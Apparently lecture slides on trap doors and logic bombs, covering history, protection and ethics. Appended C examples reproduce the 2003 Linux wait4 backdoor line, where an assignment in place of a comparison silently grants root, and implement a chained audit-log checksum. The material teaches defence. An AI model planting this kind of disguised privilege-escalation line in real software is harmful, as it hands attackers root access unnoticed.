Trap Doors & Logic Bombs
William Dotson

Overview
- Malware taxonomy
- Definitions
- Historical overview
- Protection methods
- Ethical issues

Malware Taxonomy
Malware
  Needs a host: trapdoor, Trojan horse, logic bomb, virus
  No host needed: worm, bacteria

Trap Doors
- A method of bypassing the normal authentication mechanisms of a system
- Remains hidden from casual inspection
- Can be a new program that is installed, or a modification to an existing program
- Also known as back doors

Logic Bombs
- A piece of code that executes when pre-defined conditions are met
- Logic bombs that trigger on a particular date or time are known as time bombs
- The code performs some "payload" that the user does not expect
- Shareware that deactivates itself after a trial period is not a logic bomb: that behaviour is disclosed and expected

Backdoor History
- Made famous by the movie "WarGames"
- 2003: an attempt was made to plant a backdoor in the Linux kernel
- 2003: early versions of the Sobig virus installed backdoors that were used to send its spam
- Early 2004: the MyDoom virus opened a backdoor on port 3127 that was used to send spam

Backdoor History (continued)
- No one really knows how often backdoors are inserted into software
- Some people speculate that it is a prevalent practice in the industry
- Most backdoors are "obvious and clumsy"

Backdoor History (continued)
- The attempted Linux backdoor was "more sophisticated". The planted line:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;

- Under casual inspection it looks like a check that rejects this flag combination for root (uid 0). But "=" is assignment, not comparison: whenever both flags are set, the caller's uid is set to 0, making the process root. Because the assignment evaluates to 0, the condition is false and the -EINVAL branch never runs.
- Required good knowledge of the Linux kernel
- Only caught because the change had been inserted by hand into a copy of the source tree that is normally updated automatically from the primary repository
- Caught by a file-integrity check on that copy near release

Logic Bomb History
- Some of the very first viruses contained logic bombs
- The Friday the 13th virus replicated itself and triggered its payload whenever the date was Friday the 13th, causing slowdowns
- The Michelangelo virus, one of the first viruses to get news coverage, executed on March 6 and tried to damage hard disks

Logic Bomb History (continued)
- 1985: a programmer at an insurance firm in Texas wrote a logic bomb that modified a data-retrieval function to rewrite part of main memory, rename itself, relocate itself, and then power down the computer
- 1992: a programmer at General Dynamics was fined $5,000 for planting a logic bomb that he planned to come back later and charge to remove

Logic Bomb History (continued)
- 1999: the Win32.Kriz.3862 virus triggered on Christmas Day and caused serious damage by overwriting massive amounts of data on the hard disk and rewriting the BIOS
- 2000: a Deutsche Morgan Grenfell securities trader, who had initially been hired as a programmer, was charged with inserting a logic bomb

Protection
- Difficult to prevent truly determined attackers
- Requires a thorough commitment to quality assurance, strict separation of programming duties, and strict security practices after deployment

Protection (continued)
- Segregate operations from programming and testing
- Have a carefully controlled process for moving code into production
- Give only operations staff write access to production code
- Lock down production code so that it is as close to impossible as practical for unauthorized people to modify programs
- Assign responsibility for specific production programs to named positions in operations
- Maintain a list of authorized programmers, and require approval from an authorized quality assurance officer before accepting changes into production
- Keep records of exactly which modifications were installed, when, and at whose request
- Keep audit trails running at all times, and have each audit record carry a checksum computed over both the record itself and the checksum of the record before it, so that no record can be altered or removed without breaking the chain

Protection (continued)
- Some of these seem more obvious than others
- Not all of these practices are used
- Many companies are unwilling or unable to commit the resources needed for quality assurance and extensive security measures

Hacking in the Media
- Hackers are often glorified by the press and in the media
- Hackers who get caught are often young and are written off as misguided youth
- Anti-hacking laws have been enacted that dramatically increase the penalties for anyone caught

Ethical Questions
- Should software producers be allowed to include logic bombs to ensure final payment?
- According to the government: no.
- But how many do? Probably a lot.

Legitimate Logic Bombs
- Software that is openly time-limited
- Problems arise if the company stops supporting the product
- Problems arise if the company goes out of business

Summary
- Trap doors can provide unauthorized access to a system
- Logic bombs execute malicious code when a condition, often a date or time, is met
- Total security is difficult
- How unethical are these practices, and should they ever be legal?

Resources
- Protecting against program threats. http://www.unix.org.ua/orelly/networking/puis/ch11_01.htm
- Conway, Richard. Code Hacking: A Developer's Guide to Network Security. 2004.
- A guide to protecting your computer systems from hackers. http://www.securitymanagement.com/library/Harden0201.html
- Logic Bombs. http://www.nwfusion.com/newsletters/sec/2002/01514405.html
- Thwarted Linux backdoor hints at smarter hackers. http://www.securityfocus.com/news/7388
- Backdoor – Wikipedia, the Free
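The kernel line quoted on the Backdoor History slide, rebuilt as a stand-alone user-space program so its effect can be observed. This is an added example, not code from the slides or from the kernel: struct task, wait4_check_backdoored, wait4_check_intended and the two helper functions are stand-ins introduced here; the flag values are the ones the Linux kernel defines in <linux/wait.h>, and EINVAL comes from the C library.

```c
#include <errno.h>
#include <stdio.h>

/* Flag values as defined in the Linux kernel's <linux/wait.h>.  Guarded in
 * case the C library already provides them. */
#ifndef __WALL
#define __WALL   0x40000000
#endif
#ifndef __WCLONE
#define __WCLONE 0x80000000
#endif

/* Stand-in for the only task_struct field the planted line touches. */
struct task { unsigned int uid; };

/* The line as planted in 2003.  "= 0" assigns: the caller's uid becomes 0
 * (root) as a side effect, and because the assignment evaluates to 0 the
 * whole condition is false, so -EINVAL is never returned.  Anyone who calls
 * wait4 with both flags set walks away as root. */
int wait4_check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The line as it reads under casual inspection: reject this flag
 * combination for root, leave every other caller alone. */
int wait4_check_intended(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Helpers for the demonstration: run one of the checks on a task with the
 * given uid and report either the return value or the uid afterwards. */
int retval_for(int (*check)(struct task *, unsigned int),
               unsigned int uid, unsigned int options)
{
    struct task t = { .uid = uid };
    return check(&t, options);
}

unsigned int uid_after(int (*check)(struct task *, unsigned int),
                       unsigned int uid, unsigned int options)
{
    struct task t = { .uid = uid };
    check(&t, options);
    return t.uid;
}

int main(void)
{
    unsigned int flags = __WCLONE|__WALL;
    printf("backdoored: retval=%d, uid 1000 becomes %u\n",
           retval_for(wait4_check_backdoored, 1000, flags),
           uid_after(wait4_check_backdoored, 1000, flags));
    printf("intended:   retval=%d, uid 1000 stays %u, root gets %d\n",
           retval_for(wait4_check_intended, 1000, flags),
           uid_after(wait4_check_intended, 1000, flags),
           retval_for(wait4_check_intended, 0, flags));
    return 0;
}
```

Compile with `gcc -Wall` and note that no warning is produced: GCC's -Wparentheses flags an assignment used as a truth value only when it is not wrapped in its own parentheses, and the planted line already has them. A compiler warning is therefore not a defence against this class of backdoor; review of the diff and integrity checking of the source tree, which is what caught the real one, are.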
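The chained audit-trail checksum from the Protection slide, as an added example that is not the slides' own code: each record's checksum covers the record and the checksum of the record before it, so editing or deleting an earlier entry breaks verification at every later one. It uses 64-bit FNV-1a as the checksum only to keep the code short; a real audit log would use a keyed MAC such as HMAC-SHA-256 so that an attacker with write access to the log cannot simply recompute the chain. The record structure, function names and the four sample records are all constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_RECORDS 16
#define MAX_MSG     96
#define FNV_OFFSET  0xcbf29ce484222325ULL   /* FNV-1a 64-bit offset basis */
#define FNV_PRIME   0x100000001b3ULL

struct record { char msg[MAX_MSG]; uint64_t chain; };   /* chain = checksum(prev chain, msg) */
struct audit_log { struct record rec[MAX_RECORDS]; int count; };

/* 64-bit FNV-1a, continued from an existing state h (not cryptographic). */
static uint64_t fnv1a64(uint64_t h, const void *data, size_t len)
{
    const unsigned char *p = data;
    for (size_t i = 0; i < len; i++) { h ^= p[i]; h *= FNV_PRIME; }
    return h;
}

/* Chain value of a record: hash the previous record's chain value, then the message. */
static uint64_t chain_value(uint64_t prev, const char *msg)
{
    return fnv1a64(fnv1a64(FNV_OFFSET, &prev, sizeof prev), msg, strlen(msg));
}

/* Append a record; returns its index, or -1 if the log is full or the message too long. */
int audit_append(struct audit_log *log, const char *msg)
{
    if (log->count >= MAX_RECORDS || strlen(msg) >= MAX_MSG)
        return -1;
    uint64_t prev = log->count ? log->rec[log->count - 1].chain : FNV_OFFSET;
    struct record *r = &log->rec[log->count];
    strcpy(r->msg, msg);
    r->chain = chain_value(prev, r->msg);
    return log->count++;
}

/* Walk the chain from the start.  Returns the index of the first record that
 * fails to verify, or -1 if every record verifies. */
int audit_verify(const struct audit_log *log)
{
    uint64_t prev = FNV_OFFSET;
    for (int i = 0; i < log->count; i++) {
        if (chain_value(prev, log->rec[i].msg) != log->rec[i].chain)
            return i;
        prev = log->rec[i].chain;
    }
    return -1;
}

/* Constructed sample records; not taken from any real system. */
static void build_sample_log(struct audit_log *log)
{
    memset(log, 0, sizeof *log);
    audit_append(log, "2004-03-01 09:12 payroll v3.2 installed, requested by J. Smith, QA ticket 17");
    audit_append(log, "2004-03-01 09:40 payroll v3.2 config change, requested by J. Smith");
    audit_append(log, "2004-03-02 17:05 billing v1.9 hotfix installed, requested by A. Lee, QA ticket 18");
    audit_append(log, "2004-03-03 08:00 nightly integrity check passed");
}

int demo_clean(void)
{
    struct audit_log log;
    build_sample_log(&log);
    return audit_verify(&log);
}

/* Scenario 1: record idx is edited but its checksum is left alone. */
int demo_tamper(int idx)
{
    struct audit_log log;
    build_sample_log(&log);
    strcpy(log.rec[idx].msg, "2004-03-01 09:40 payroll v3.2 config change, requested by QA");
    return audit_verify(&log);
}

/* Scenario 2: the attacker also recomputes that record's checksum.  The record
 * itself now verifies, but the next record's stored checksum was computed over
 * the old value, so verification fails one step later.  Only the final record
 * can be rewritten this way undetected, which is why the current head of the
 * chain should be copied somewhere the log writer cannot reach. */
int demo_tamper_and_recompute(int idx)
{
    struct audit_log log;
    build_sample_log(&log);
    uint64_t prev = idx ? log.rec[idx - 1].chain : FNV_OFFSET;
    strcpy(log.rec[idx].msg, "2004-03-01 09:40 payroll v3.2 config change, requested by QA");
    log.rec[idx].chain = chain_value(prev, log.rec[idx].msg);
    return audit_verify(&log);
}

int main(void)
{
    printf("clean log, first bad record: %d (-1 = all verify)\n", demo_clean());
    printf("record 1 edited: %d\n", demo_tamper(1));
    printf("record 1 edited and checksum recomputed: %d\n", demo_tamper_and_recompute(1));
    printf("last record edited and checksum recomputed: %d\n", demo_tamper_and_recompute(3));
    return 0;
}
```

The last printf shows the limit of a bare chain: the newest record can always be rewritten by whoever can write the log, so the slide's advice only holds fully when the chain head is also recorded out of the writer's reach (a copy on another host, a printout, or a signed timestamp).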